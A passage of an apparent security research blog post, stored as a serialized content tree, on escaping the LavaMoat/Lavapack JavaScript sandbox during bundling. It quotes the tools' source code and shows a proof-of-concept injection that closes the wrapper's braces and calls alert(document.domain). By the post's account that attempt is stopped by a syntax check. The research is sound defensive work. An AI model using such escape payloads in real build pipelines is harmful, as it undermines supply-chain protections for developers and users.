popular, trusted package.",{"type":25,"tag":38,"props":51511,"children":51512},{},[51513,51515,51522],{"type":31,"value":51514},"Instead, Lavamoat looks at how each package is connected by ",{"type":25,"tag":162,"props":51516,"children":51519},{"href":51517,"rel":51518},"https://github.com/LavaMoat/LavaMoat/blob/f3e53c8c44f063f000adc620b0aa3f7a41dda5c6/packages/core/src/walk.js#L22",[166],[51520],{"type":31,"value":51521},"walking the modules",{"type":31,"value":51523}," in a project's dependency tree, thus generating a unique name for each package.",{"type":25,"tag":630,"props":51525,"children":51527},{"id":51526},"scuttling",[51528],{"type":31,"value":51125},{"type":25,"tag":38,"props":51530,"children":51531},{},[51532,51534,51540],{"type":31,"value":51533},"Scuttling is an optional feature that adds an extra layer of protection. Even if the real ",{"type":25,"tag":82,"props":51535,"children":51537},{"className":51536},[],[51538],{"type":31,"value":51539},"GlobalThis",{"type":31,"value":51541}," object is leaked by an attacker or accessed through a malicious package manager, scuttling removes sensitive APIs, preventing malicious requests from being executed.",{"type":25,"tag":38,"props":51543,"children":51544},{},[51545,51547,51554],{"type":31,"value":51546},"For example, ",{"type":25,"tag":162,"props":51548,"children":51551},{"href":51549,"rel":51550},"https://github.com/LavaMoat/LavaMoat/blob/f3e53c8c44f063f000adc620b0aa3f7a41dda5c6/packages/core/src/scuttle.js#L57",[166],[51552],{"type":31,"value":51553},"here",{"type":31,"value":51555}," we see how Lavamoat checks if the feature is enabled after the root package compartment is created:",{"type":25,"tag":206,"props":51557,"children":51559},{"className":35325,"code":51558,"language":35327,"meta":7,"style":7},"    if (scuttleOpts.enabled) {\n      if (!Array.isArray(scuttleOpts.exceptions)) {\n        throw new Error(`LavaMoat - scuttleGlobalThis.exceptions must be an array, got \"${typeof scuttleOpts.exceptions}\"`)\n      }\n      scuttleOpts.scuttlerFunc(globalRef, realm => performScuttleGlobalThis(realm, scuttleOpts.exceptions))\n    }\n",[51560],{"type":25,"tag":82,"props":51561,"children":51562},{"__ignoreMap":7},[51563,51592,51642,51701,51708,51780],{"type":25,"tag":216,"props":51564,"children":51565},{"class":6922,"line":6923},[51566,51570,51574,51579,51583,51588],{"type":25,"tag":216,"props":51567,"children":51568},{"style":6973},[51569],{"type":31,"value":16235},{"type":25,"tag":216,"props":51571,"children":51572},{"style":6964},[51573],{"type":31,"value":7016},{"type":25,"tag":216,"props":51575,"children":51576},{"style":6947},[51577],{"type":31,"value":51578},"scuttleOpts",{"type":25,"tag":216,"props":51580,"children":51581},{"style":6964},[51582],{"type":31,"value":179},{"type":25,"tag":216,"props":51584,"children":51585},{"style":6947},[51586],{"type":31,"value":51587},"enabled",{"type":25,"tag":216,"props":51589,"children":51590},{"style":6964},[51591],{"type":31,"value":18761},{"type":25,"tag":216,"props":51593,"children":51594},{"class":6922,"line":6769},[51595,51599,51603,51607,51612,51616,51621,51625,51629,51633,51638],{"type":25,"tag":216,"props":51596,"children":51597},{"style":6973},[51598],{"type":31,"value":43250},{"type":25,"tag":216,"props":51600,"children":51601},{"style":6964},[51602],{"type":31,"value":7016},{"type":25,"tag":216,"props":51604,"children":51605},{"style":6953},[51606],{"type":31,"value":24581},{"type":25,"tag":216,"props":51608,"children":51609},{"style":6947},[51610],{"type":31,"value":51611},"Array",{"type":25,"tag":216,"props":51613,"children":51614},{"style":6964},[51615],{"type":31,"value":179},{"type":25,"tag":216,"props":51617,"children":51618},{"style":7047},[51619],{"type":31,"value":51620},"isArray",{"type":25,"tag":216,"props":51622,"children":51623},{"style":6964},[51624],{"type":31,"value":1850},{"type":25,"tag":216,"props":51626,"children":51627},{"style":6947},[51628],{"type":31,"value":51578},{"type":25,"tag":216,"props":51630,"children":51631},{"style":6964},[51632],{"type":31,"value":179},{"type":25,"tag":216,"props":51634,"children":51635},{"style":6947},[51636],{"type":31,"value":51637},"exceptions",{"type":25,"tag":216,"props":51639,"children":51640},{"style":6964},[51641],{"type":31,"value":39157},{"type":25,"tag":216,"props":51643,"children":51644},{"class":6922,"line":6778},[51645,51650,51654,51658,51662,51667,51671,51675,51680,51684,51688,51692,51697],{"type":25,"tag":216,"props":51646,"children":51647},{"style":6973},[51648],{"type":31,"value":51649},"        throw",{"type":25,"tag":216,"props":51651,"children":51652},{"style":6936},[51653],{"type":31,"value":35895},{"type":25,"tag":216,"props":51655,"children":51656},{"style":7047},[51657],{"type":31,"value":44247},{"type":25,"tag":216,"props":51659,"children":51660},{"style":6964},[51661],{"type":31,"value":1850},{"type":25,"tag":216,"props":51663,"children":51664},{"style":8205},[51665],{"type":31,"value":51666},"`LavaMoat - scuttleGlobalThis.exceptions must be an array, got \"",{"type":25,"tag":216,"props":51668,"children":51669},{"style":6936},[51670],{"type":31,"value":38071},{"type":25,"tag":216,"props":51672,"children":51673},{"style":6936},[51674],{"type":31,"value":35365},{"type":25,"tag":216,"props":51676,"children":51677},{"style":6947},[51678],{"type":31,"value":51679}," scuttleOpts",{"type":25,"tag":216,"props":51681,"children":51682},{"style":6953},[51683],{"type":31,"value":179},{"type":25,"tag":216,"props":51685,"children":51686},{"style":6947},[51687],{"type":31,"value":51637},{"type":25,"tag":216,"props":51689,"children":51690},{"style":6936},[51691],{"type":31,"value":38103},{"type":25,"tag":216,"props":51693,"children":51694},{"style":8205},[51695],{"type":31,"value":51696},"\"`",{"type":25,"tag":216,"props":51698,"children":51699},{"style":6964},[51700],{"type":31,"value":7107},{"type":25,"tag":216,"props":51702,"children":51703},{"class":6922,"line":7005},[51704],{"type":25,"tag":216,"props":51705,"children":51706},{"style":6964},[51707],{"type":31,"value":16620},{"type":25,"tag":216,"props":51709,"children":51710},{"class":6922,"line":7110},[51711,51716,51720,51725,51729,51734,51738,51743,51747,51752,51756,51760,51764,51768,51772,51776],{"type":25,"tag":216,"props":51712,"children":51713},{"style":6947},[51714],{"type":31,"value":51715},"      scuttleOpts",{"type":25,"tag":216,"props":51717,"children":51718},{"style":6964},[51719],{"type":31,"value":179},{"type":25,"tag":216,"props":51721,"children":51722},{"style":7047},[51723],{"type":31,"value":51724},"scuttlerFunc",{"type":25,"tag":216,"props":51726,"children":51727},{"style":6964},[51728],{"type":31,"value":1850},{"type":25,"tag":216,"props":51730,"children":51731},{"style":6947},[51732],{"type":31,"value":51733},"globalRef",{"type":25,"tag":216,"props":51735,"children":51736},{"style":6964},[51737],{"type":31,"value":7026},{"type":25,"tag":216,"props":51739,"children":51740},{"style":6947},[51741],{"type":31,"value":51742},"realm",{"type":25,"tag":216,"props":51744,"children":51745},{"style":6936},[51746],{"type":31,"value":31711},{"type":25,"tag":216,"props":51748,"children":51749},{"style":7047},[51750],{"type":31,"value":51751}," performScuttleGlobalThis",{"type":25,"tag":216,"props":51753,"children":51754},{"style":6964},[51755],{"type":31,"value":1850},{"type":25,"tag":216,"props":51757,"children":51758},{"style":6947},[51759],{"type":31,"value":51742},{"type":25,"tag":216,"props":51761,"children":51762},{"style":6964},[51763],{"type":31,"value":7026},{"type":25,"tag":216,"props":51765,"children":51766},{"style":6947},[51767],{"type":31,"value":51578},{"type":25,"tag":216,"props":51769,"children":51770},{"style":6964},[51771],{"type":31,"value":179},{"type":25,"tag":216,"props":51773,"children":51774},{"style":6947},[51775],{"type":31,"value":51637},{"type":25,"tag":216,"props":51777,"children":51778},{"style":6964},[51779],{"type":31,"value":23672},{"type":25,"tag":216,"props":51781,"children":51782},{"class":6922,"line":7216},[51783],{"type":25,"tag":216,"props":51784,"children":51785},{"style":6964},[51786],{"type":31,"value":7311},{"type":25,"tag":38,"props":51788,"children":51789},{},[51790,51792,51798,51800,51806],{"type":31,"value":51791},"Subsequently, the code defines a ",{"type":25,"tag":162,"props":51793,"children":51796},{"href":51794,"rel":51795},"https://github.com/LavaMoat/LavaMoat/blob/f3e53c8c44f063f000adc620b0aa3f7a41dda5c6/packages/core/src/scuttle.js#L74",[166],[51797],{"type":31,"value":35339},{"type":31,"value":51799}," called ",{"type":25,"tag":82,"props":51801,"children":51803},{"className":51802},[],[51804],{"type":31,"value":51805},"generateScuttleOpts",{"type":31,"value":51807}," that creates and returns an options object.",{"type":25,"tag":38,"props":51809,"children":51810},{},[51811,51813,51819,51820,51826,51828,51833,51835,51841],{"type":31,"value":51812},"Finally, the ",{"type":25,"tag":82,"props":51814,"children":51816},{"className":51815},[],[51817],{"type":31,"value":51818},"performScuttleGlobalThis",{"type":31,"value":10409},{"type":25,"tag":162,"props":51821,"children":51824},{"href":51822,"rel":51823},"https://github.com/LavaMoat/LavaMoat/blob/f3e53c8c44f063f000adc620b0aa3f7a41dda5c6/packages/core/src/scuttle.js#L125",[166],[51825],{"type":31,"value":35339},{"type":31,"value":51827}," modifies the properties of the global object (",{"type":25,"tag":82,"props":51829,"children":51831},{"className":51830},[],[51832],{"type":31,"value":51733},{"type":31,"value":51834},"). It starts by creating an array ",{"type":25,"tag":82,"props":51836,"children":51838},{"className":51837},[],[51839],{"type":31,"value":51840},"props",{"type":31,"value":51842},", containing the names of all properties in the prototype chain of globalRef. Then, an empty object is then created to serve as a proxy for scuttled properties. The function then iterates over each property, making changes to the global window object based on the provided configuration.",{"type":25,"tag":26,"props":51844,"children":51846},{"id":51845},"hacking-webpacks",[51847],{"type":31,"value":51848},"Hacking Webpacks",{"type":25,"tag":38,"props":51850,"children":51851},{},[51852],{"type":31,"value":51853},"Now let's get to the fun stuff.",{"type":25,"tag":38,"props":51855,"children":51856},{},[51857],{"type":31,"value":51858},"Webpack is used to bundle all modules and packages into a single file. It inserts all the code of these modules into the bundle file. Checking Lavapack source code, we can see how this actually happens.",{"type":25,"tag":206,"props":51860,"children":51862},{"className":35325,"code":51861,"language":35327,"meta":7,"style":7},"  const filename = encodeURI(String(moduleData.file))\n  let moduleWrapperSource\n  if (bundleWithPrecompiledModules) {\n    moduleWrapperSource = `function(){\n      with (this.scopeTerminator) {\n        with (this.globalThis) {\n          return function() {\n            'use strict';\n            // source: ${filename}\n            return function (require, module, exports) {\n              __MODULE_CONTENT__\n            };\n          };\n        }\n      }\n    }`\n",[51863],{"type":25,"tag":82,"props":51864,"children":51865},{"__ignoreMap":7},[51866,51918,51930,51950,51967,51975,51983,51991,51999,52020,52028,52036,52044,52051,52058,52065],{"type":25,"tag":216,"props":51867,"children":51868},{"class":6922,"line":6923},[51869,51873,51878,51882,51887,51891,51896,51900,51905,51909,51914],{"type":25,"tag":216,"props":51870,"children":51871},{"style":6936},[51872],{"type":31,"value":40151},{"type":25,"tag":216,"props":51874,"children":51875},{"style":6947},[51876],{"type":31,"value":51877}," filename",{"type":25,"tag":216,"props":51879,"children":51880},{"style":6953},[51881],{"type":31,"value":6956},{"type":25,"tag":216,"props":51883,"children":51884},{"style":7047},[51885],{"type":31,"value":51886}," encodeURI",{"type":25,"tag":216,"props":51888,"children":51889},{"style":6964},[51890],{"type":31,"value":1850},{"type":25,"tag":216,"props":51892,"children":51893},{"style":7047},[51894],{"type":31,"value":51895},"String",{"type":25,"tag":216,"props":51897,"children":51898},{"style":6964},[51899],{"type":31,"value":1850},{"type":25,"tag":216,"props":51901,"children":51902},{"style":6947},[51903],{"type":31,"value":51904},"moduleData",{"type":25,"tag":216,"props":51906,"children":51907},{"style":6964},[51908],{"type":31,"value":179},{"type":25,"tag":216,"props":51910,"children":51911},{"style":6947},[51912],{"type":31,"value":51913},"file",{"type":25,"tag":216,"props":51915,"children":51916},{"style":6964},[51917],{"type":31,"value":23672},{"type":25,"tag":216,"props":51919,"children":51920},{"class":6922,"line":6769},[51921,51925],{"type":25,"tag":216,"props":51922,"children":51923},{"style":6936},[51924],{"type":31,"value":11807},{"type":25,"tag":216,"props":51926,"children":51927},{"style":6947},[51928],{"type":31,"value":51929}," moduleWrapperSource\n",{"type":25,"tag":216,"props":51931,"children":51932},{"class":6922,"line":6778},[51933,51937,51941,51946],{"type":25,"tag":216,"props":51934,"children":51935},{"style":6973},[51936],{"type":31,"value":35356},{"type":25,"tag":216,"props":51938,"children":51939},{"style":6964},[51940],{"type":31,"value":7016},{"type":25,"tag":216,"props":51942,"children":51943},{"style":6947},[51944],{"type":31,"value":51945},"bundleWithPrecompiledModules",{"type":25,"tag":216,"props":51947,"children":51948},{"style":6964},[51949],{"type":31,"value":18761},{"type":25,"tag":216,"props":51951,"children":51952},{"class":6922,"line":7005},[51953,51958,51962],{"type":25,"tag":216,"props":51954,"children":51955},{"style":6947},[51956],{"type":31,"value":51957},"    moduleWrapperSource",{"type":25,"tag":216,"props":51959,"children":51960},{"style":6953},[51961],{"type":31,"value":6956},{"type":25,"tag":216,"props":51963,"children":51964},{"style":8205},[51965],{"type":31,"value":51966}," `function(){\n",{"type":25,"tag":216,"props":51968,"children":51969},{"class":6922,"line":7110},[51970],{"type":25,"tag":216,"props":51971,"children":51972},{"style":8205},[51973],{"type":31,"value":51974},"      with (this.scopeTerminator) {\n",{"type":25,"tag":216,"props":51976,"children":51977},{"class":6922,"line":7216},[51978],{"type":25,"tag":216,"props":51979,"children":51980},{"style":8205},[51981],{"type":31,"value":51982},"        with (this.globalThis) {\n",{"type":25,"tag":216,"props":51984,"children":51985},{"class":6922,"line":7244},[51986],{"type":25,"tag":216,"props":51987,"children":51988},{"style":8205},[51989],{"type":31,"value":51990},"          return function() {\n",{"type":25,"tag":216,"props":51992,"children":51993},{"class":6922,"line":7257},[51994],{"type":25,"tag":216,"props":51995,"children":51996},{"style":8205},[51997],{"type":31,"value":51998},"            'use strict';\n",{"type":25,"tag":216,"props":52000,"children":52001},{"class":6922,"line":7275},[52002,52007,52011,52016],{"type":25,"tag":216,"props":52003,"children":52004},{"style":8205},[52005],{"type":31,"value":52006},"            // source: ",{"type":25,"tag":216,"props":52008,"children":52009},{"style":6936},[52010],{"type":31,"value":38071},{"type":25,"tag":216,"props":52012,"children":52013},{"style":6947},[52014],{"type":31,"value":52015},"filename",{"type":25,"tag":216,"props":52017,"children":52018},{"style":6936},[52019],{"type":31,"value":7874},{"type":25,"tag":216,"props":52021,"children":52022},{"class":6922,"line":7296},[52023],{"type":25,"tag":216,"props":52024,"children":52025},{"style":8205},[52026],{"type":31,"value":52027},"            return function (require, module, exports) {\n",{"type":25,"tag":216,"props":52029,"children":52030},{"class":6922,"line":7305},[52031],{"type":25,"tag":216,"props":52032,"children":52033},{"style":8205},[52034],{"type":31,"value":52035},"              __MODULE_CONTENT__\n",{"type":25,"tag":216,"props":52037,"children":52038},{"class":6922,"line":7557},[52039],{"type":25,"tag":216,"props":52040,"children":52041},{"style":8205},[52042],{"type":31,"value":52043},"            };\n",{"type":25,"tag":216,"props":52045,"children":52046},{"class":6922,"line":7574},[52047],{"type":25,"tag":216,"props":52048,"children":52049},{"style":8205},[52050],{"type":31,"value":12655},{"type":25,"tag":216,"props":52052,"children":52053},{"class":6922,"line":7591},[52054],{"type":25,"tag":216,"props":52055,"children":52056},{"style":8205},[52057],{"type":31,"value":7302},{"type":25,"tag":216,"props":52059,"children":52060},{"class":6922,"line":7604},[52061],{"type":25,"tag":216,"props":52062,"children":52063},{"style":8205},[52064],{"type":31,"value":16620},{"type":25,"tag":216,"props":52066,"children":52067},{"class":6922,"line":7613},[52068],{"type":25,"tag":216,"props":52069,"children":52070},{"style":8205},[52071],{"type":31,"value":52072},"    }`\n",{"type":25,"tag":38,"props":52074,"children":52075},{},[52076,52078,52084,52086,52092],{"type":31,"value":52077},"Lavapack uses ",{"type":25,"tag":82,"props":52079,"children":52081},{"className":52080},[],[52082],{"type":31,"value":52083},"with()",{"type":31,"value":52085}," proxies to restrict the objects accessible by the module, and ",{"type":25,"tag":82,"props":52087,"children":52089},{"className":52088},[],[52090],{"type":31,"value":52091},"__MODULE_CONTENT__",{"type":31,"value":52093}," is replaced by the content of a file required by the project being built.",{"type":25,"tag":606,"props":52095,"children":52097},{"id":52096},"injection-not-so-simple",[52098],{"type":31,"value":52099},"Injection? Not So Simple",{"type":25,"tag":38,"props":52101,"children":52102},{},[52103,52105,52110],{"type":31,"value":52104},"We first tried to inject invalid javascript inside a javascript file, and then attempt to escape the ",{"type":25,"tag":82,"props":52106,"children":52108},{"className":52107},[],[52109],{"type":31,"value":16607},{"type":31,"value":52111}," environment:",{"type":25,"tag":206,"props":52113,"children":52115},{"className":35325,"code":52114,"language":35327,"meta":7,"style":7},"   } // end function 1\n  } // end function 2\n } // end with 1\n} // end with 2\n\nalert(document.domain)\n",[52116],{"type":25,"tag":82,"props":52117,"children":52118},{"__ignoreMap":7},[52119,52132,52144,52156,52168,52175],{"type":25,"tag":216,"props":52120,"children":52121},{"class":6922,"line":6923},[52122,52127],{"type":25,"tag":216,"props":52123,"children":52124},{"style":6964},[52125],{"type":31,"value":52126},"   } ",{"type":25,"tag":216,"props":52128,"children":52129},{"style":6927},[52130],{"type":31,"value":52131},"// end function 1\n",{"type":25,"tag":216,"props":52133,"children":52134},{"class":6922,"line":6769},[52135,52139],{"type":25,"tag":216,"props":52136,"children":52137},{"style":6964},[52138],{"type":31,"value":35430},{"type":25,"tag":216,"props":52140,"children":52141},{"style":6927},[52142],{"type":31,"value":52143},"// end function 2\n",{"type":25,"tag":216,"props":52145,"children":52146},{"class":6922,"line":6778},[52147,52151],{"type":25,"tag":216,"props":52148,"children":52149},{"style":6964},[52150],{"type":31,"value":40165},{"type":25,"tag":216,"props":52152,"children":52153},{"style":6927},[52154],{"type":31,"value":52155},"// end with 1\n",{"type":25,"tag":216,"props":52157,"children":52158},{"class":6922,"line":7005},[52159,52163],{"type":25,"tag":216,"props":52160,"children":52161},{"style":6964},[52162],{"type":31,"value":50842},{"type":25,"tag":216,"props":52164,"children":52165},{"style":6927},[52166],{"type":31,"value":52167},"// end with 2\n",{"type":25,"tag":216,"props":52169,"children":52170},{"class":6922,"line":7110},[52171],{"type":25,"tag":216,"props":52172,"children":52173},{"emptyLinePlaceholder":16},[52174],{"type":31,"value":7642},{"type":25,"tag":216,"props":52176,"children":52177},{"class":6922,"line":7216},[52178,52182,52186,52190,52194,52198],{"type":25,"tag":216,"props":52179,"children":52180},{"style":7047},[52181],{"type":31,"value":36660},{"type":25,"tag":216,"props":52183,"children":52184},{"style":6964},[52185],{"type":31,"value":1850},{"type":25,"tag":216,"props":52187,"children":52188},{"style":6947},[52189],{"type":31,"value":36670},{"type":25,"tag":216,"props":52191,"children":52192},{"style":6964},[52193],{"type":31,"value":179},{"type":25,"tag":216,"props":52195,"children":52196},{"style":6947},[52197],{"type":31,"value":36680},{"type":25,"tag":216,"props":52199,"children":52200},{"style":6964},[52201],{"type":31,"value":7107},{"type":25,"tag":38,"props":52203,"children":52204},{},[52205,52207,52213,52215,52222],{"type":31,"value":52206},"However, when we tried to bundle it, a ",{"type":25,"tag":82,"props":52208,"children":52210},{"className":52209},[],[52211],{"type":31,"value":52212},"ParseError",{"type":31,"value":52214}," was thrown. This is because Lavapack is a plugin of ",{"type":25,"tag":162,"props":52216,"children":52219},{"href":52217,"rel":52218},"https://github.com/browserify/browserify",[166],[52220],{"type":31,"value":52221},"browserify",{"type":31,"value":52223},", which has a syntax check before replacing the code.",{"type":25,"tag":38,"props":52225,"children":52226},{},[52227,52229,52235,52237,52243,52245,52251,52253,52258],{"type":31,"value":52228},"Looking deeper into browserify, we find it has a ",{"type":25,"tag":82,"props":52230,"children":52232},{"className":52231},[],[52233],{"type":31,"value":52234},"syntax",{"type":31,"value":52236}," stage on it's pipeline, and uses the ",{"type":25,"tag":82,"props":52238,"children":52240},{"className":52239},[],[52241],{"type":31,"value":52242},"syntax-error",{"type":31,"value":52244}," npm package to validate the syntax of each javascript file content. Since Lavapack replaces the ",{"type":25,"tag":82,"props":52246,"children":52248},{"className":52247},[],[52249],{"type":31,"value":52250},"pack",{"type":31,"value":52252}," stage on browserify pipeline, which comes after the ",{"type":25,"tag":82,"props":52254,"children":52256},{"className":52255},[],[52257],{"type":31,"value":52234},{"type":31,"value":52259},", it was not possible to inject invalid javascript to escape the Lavamoat sandbox.",{"type":25,"tag":38,"props":52261,"children":52262},{},[52263],{"type":25,"tag":6467,"props":52264,"children":52267},{"alt":52265,"src":52266},"Pipeline","/posts/supply-chain-attacks-a-new-era/pipeline.png",[],{"type":25,"tag":38,"props":52269,"children":52270},{},[52271,52272,52277,52279,52284],{"type":31,"value":474},{"type":25,"tag":82,"props":52273,"children":52275},{"className":52274},[],[52276],{"type":31,"value":52242},{"type":31,"value":52278}," package performs a syntax check by using  ",{"type":25,"tag":82,"props":52280,"children":52282},{"className":52281},[],[52283],{"type":31,"value":41511},{"type":31,"value":52285}," with function hoisting:",{"type":25,"tag":206,"props":52287,"children":52289},{"className":35325,"code":52288,"language":35327,"meta":7,"style":7},"try {\n    eval('throw \"STOP\"; (function () { ' + src + '\\n})()');\n    return;\n}\ncatch (err) {\n    if (err === 'STOP') return undefined;\n    if (err.constructor.name !== 'SyntaxError') return err;\n    return errorInfo(src, file, opts);\n}\n",[52290],{"type":25,"tag":82,"props":52291,"children":52292},{"__ignoreMap":7},[52293,52305,52355,52366,52373,52394,52435,52495,52536],{"type":25,"tag":216,"props":52294,"children":52295},{"class":6922,"line":6923},[52296,52301],{"type":25,"tag":216,"props":52297,"children":52298},{"style":6973},[52299],{"type":31,"value":52300},"try",{"type":25,"tag":216,"props":52302,"children":52303},{"style":6964},[52304],{"type":31,"value":7241},{"type":25,"tag":216,"props":52306,"children":52307},{"class":6922,"line":6769},[52308,52313,52317,52322,52326,52331,52335,52340,52346,52351],{"type":25,"tag":216,"props":52309,"children":52310},{"style":7047},[52311],{"type":31,"value":52312},"    eval",{"type":25,"tag":216,"props":52314,"children":52315},{"style":6964},[52316],{"type":31,"value":1850},{"type":25,"tag":216,"props":52318,"children":52319},{"style":8205},[52320],{"type":31,"value":52321},"'throw \"STOP\"; (function () { '",{"type":25,"tag":216,"props":52323,"children":52324},{"style":6953},[52325],{"type":31,"value":12858},{"type":25,"tag":216,"props":52327,"children":52328},{"style":6947},[52329],{"type":31,"value":52330}," src",{"type":25,"tag":216,"props":52332,"children":52333},{"style":6953},[52334],{"type":31,"value":12858},{"type":25,"tag":216,"props":52336,"children":52337},{"style":8205},[52338],{"type":31,"value":52339}," '",{"type":25,"tag":216,"props":52341,"children":52343},{"style":52342},"--shiki-default:#D7BA7D",[52344],{"type":31,"value":52345},"\\n",{"type":25,"tag":216,"props":52347,"children":52348},{"style":8205},[52349],{"type":31,"value":52350},"})()'",{"type":25,"tag":216,"props":52352,"children":52353},{"style":6964},[52354],{"type":31,"value":7797},{"type":25,"tag":216,"props":52356,"children":52357},{"class":6922,"line":6778},[52358,52362],{"type":25,"tag":216,"props":52359,"children":52360},{"style":6973},[52361],{"type":31,"value":20947},{"type":25,"tag":216,"props":52363,"children":52364},{"style":6964},[52365],{"type":31,"value":6967},{"type":25,"tag":216,"props":52367,"children":52368},{"class":6922,"line":7005},[52369],{"type":25,"tag":216,"props":52370,"children":52371},{"style":6964},[52372],{"type":31,"value":7874},{"type":25,"tag":216,"props":52374,"children":52375},{"class":6922,"line":7110},[52376,52381,52385,52390],{"type":25,"tag":216,"props":52377,"children":52378},{"style":6973},[52379],{"type":31,"value":52380},"catch",{"type":25,"tag":216,"props":52382,"children":52383},{"style":6964},[52384],{"type":31,"value":7016},{"type":25,"tag":216,"props":52386,"children":52387},{"style":6947},[52388],{"type":31,"value":52389},"err",{"type":25,"tag":216,"props":52391,"children":52392},{"style":6964},[52393],{"type":31,"value":18761},{"type":25,"tag":216,"props":52395,"children":52396},{"class":6922,"line":7216},[52397,52401,52405,52409,52413,52418,52422,52427,52431],{"type":25,"tag":216,"props":52398,"children":52399},{"style":6973},[52400],{"type":31,"value":16235},{"type":25,"tag":216,"props":52402,"children":52403},{"style":6964},[52404],{"type":31,"value":7016},{"type":25,"tag":216,"props":52406,"children":52407},{"style":6947},[52408],{"type":31,"value":52389},{"type":25,"tag":216,"props":52410,"children":52411},{"style":6953},[52412],{"type":31,"value":35384},{"type":25,"tag":216,"props":52414,"children":52415},{"style":8205},[52416],{"type":31,"value":52417}," 'STOP'",{"type":25,"tag":216,"props":52419,"children":52420},{"style":6964},[52421],{"type":31,"value":7036},{"type":25,"tag":216,"props":52423,"children":52424},{"style":6973},[52425],{"type":31,"value":52426},"return",{"type":25,"tag":216,"props":52428,"children":52429},{"style":6936},[52430],{"type":31,"value":43301},{"type":25,"tag":216,"props":52432,"children":52433},{"style":6964},[52434],{"type":31,"value":6967},{"type":25,"tag":216,"props":52436,"children":52437},{"class":6922,"line":7244},[52438,52442,52446,52450,52454,52459,52463,52468,52473,52478,52482,52486,52491],{"type":25,"tag":216,"props":52439,"children":52440},{"style":6973},[52441],{"type":31,"value":16235},{"type":25,"tag":216,"props":52443,"children":52444},{"style":6964},[52445],{"type":31,"value":7016},{"type":25,"tag":216,"props":52447,"children":52448},{"style":6947},[52449],{"type":31,"value":52389},{"type":25,"tag":216,"props":52451,"children":52452},{"style":6964},[52453],{"type":31,"value":179},{"type":25,"tag":216,"props":52455,"children":52456},{"style":6947},[52457],{"type":31,"value":52458},"constructor",{"type":25,"tag":216,"props":52460,"children":52461},{"style":6964},[52462],{"type":31,"value":179},{"type":25,"tag":216,"props":52464,"children":52465},{"style":6947},[52466],{"type":31,"value":52467},"name",{"type":25,"tag":216,"props":52469,"children":52470},{"style":6953},[52471],{"type":31,"value":52472}," !==",{"type":25,"tag":216,"props":52474,"children":52475},{"style":8205},[52476],{"type":31,"value":52477}," 'SyntaxError'",{"type":25,"tag":216,"props":52479,"children":52480},{"style":6964},[52481],{"type":31,"value":7036},{"type":25,"tag":216,"props":52483,"children":52484},{"style":6973},[52485],{"type":31,"value":52426},{"type":25,"tag":216,"props":52487,"children":52488},{"style":6947},[52489],{"type":31,"value":52490}," err",{"type":25,"tag":216,"props":52492,"children":52493},{"style":6964},[52494],{"type":31,"value":6967},{"type":25,"tag":216,"props":52496,"children":52497},{"class":6922,"line":7257},[52498,52502,52507,52511,52515,52519,52523,52527,52532],{"type":25,"tag":216,"props":52499,"children":52500},{"style":6973},[52501],{"type":31,"value":20947},{"type":25,"tag":216,"props":52503,"children":52504},{"style":7047},[52505],{"type":31,"value":52506}," errorInfo",{"type":25,"tag":216,"props":52508,"children":52509},{"style":6964},[52510],{"type":31,"value":1850},{"type":25,"tag":216,"props":52512,"children":52513},{"style":6947},[52514],{"type":31,"value":36632},{"type":25,"tag":216,"props":52516,"children":52517},{"style":6964},[52518],{"type":31,"value":7026},{"type":25,"tag":216,"props":52520,"children":52521},{"style":6947},[52522],{"type":31,"value":51913},{"type":25,"tag":216,"props":52524,"children":52525},{"style":6964},[52526],{"type":31,"value":7026},{"type":25,"tag":216,"props":52528,"children":52529},{"style":6947},[52530],{"type":31,"value":52531},"opts",{"type":25,"tag":216,"props":52533,"children":52534},{"style":6964},[52535],{"type":31,"value":7797},{"type":25,"tag":216,"props":52537,"children":52538},{"class":6922,"line":7275},[52539],{"type":25,"tag":216,"props":52540,"children":52541},{"style":6964},[52542],{"type":31,"value":7874},{"type":25,"tag":38,"props":52544,"children":52545},{},[52546,52548,52552,52554,52560,52562,52567],{"type":31,"value":52547},"Interestingly, it ",{"type":25,"tag":64,"props":52549,"children":52550},{},[52551],{"type":31,"value":7949},{"type":31,"value":52553}," possible to inject a ",{"type":25,"tag":82,"props":52555,"children":52557},{"className":52556},[],[52558],{"type":31,"value":52559},"}); (() => {",{"type":31,"value":52561}," inside source, and will not throw a syntax error. Unfortunately, this is not enough to bypass the ",{"type":25,"tag":82,"props":52563,"children":52565},{"className":52564},[],[52566],{"type":31,"value":52083},{"type":31,"value":52568}," sandbox of Lavapack.",{"type":25,"tag":606,"props":52570,"children":52572},{"id":52571},"sourcemap-the-syntax-killer",[52573],{"type":31,"value":52574},"SourceMap: The Syntax Killer",{"type":25,"tag":38,"props":52576,"children":52577},{},[52578,52580,52587],{"type":31,"value":52579},"Lavapack has a feature to extract source maps files from the code using ",{"type":25,"tag":162,"props":52581,"children":52584},{"href":52582,"rel":52583},"https://www.npmjs.com/package/convert-source-map",[166],[52585],{"type":31,"value":52586},"convert-source-map",{"type":31,"value":52588}," npm package:",{"type":25,"tag":206,"props":52590,"children":52592},{"className":35325,"code":52591,"language":35327,"meta":7,"style":7},"function extractSourceMaps(sourceCode) {\n  const converter = convertSourceMap.fromSource(sourceCode)\n  // if (!converter) throw new Error('Unable to find original inlined sourcemap')\n  const maps = converter && converter.toObject()\n  const code = convertSourceMap.removeComments(sourceCode)\n  return { code, maps }\n}\n",[52593],{"type":25,"tag":82,"props":52594,"children":52595},{"__ignoreMap":7},[52596,52620,52662,52670,52711,52752,52780],{"type":25,"tag":216,"props":52597,"children":52598},{"class":6922,"line":6923},[52599,52603,52608,52612,52616],{"type":25,"tag":216,"props":52600,"children":52601},{"style":6936},[52602],{"type":31,"value":35339},{"type":25,"tag":216,"props":52604,"children":52605},{"style":7047},[52606],{"type":31,"value":52607}," extractSourceMaps",{"type":25,"tag":216,"props":52609,"children":52610},{"style":6964},[52611],{"type":31,"value":1850},{"type":25,"tag":216,"props":52613,"children":52614},{"style":6947},[52615],{"type":31,"value":41977},{"type":25,"tag":216,"props":52617,"children":52618},{"style":6964},[52619],{"type":31,"value":18761},{"type":25,"tag":216,"props":52621,"children":52622},{"class":6922,"line":6769},[52623,52627,52632,52636,52641,52645,52650,52654,52658],{"type":25,"tag":216,"props":52624,"children":52625},{"style":6936},[52626],{"type":31,"value":40151},{"type":25,"tag":216,"props":52628,"children":52629},{"style":6947},[52630],{"type":31,"value":52631}," converter",{"type":25,"tag":216,"props":52633,"children":52634},{"style":6953},[52635],{"type":31,"value":6956},{"type":25,"tag":216,"props":52637,"children":52638},{"style":6947},[52639],{"type":31,"value":52640}," 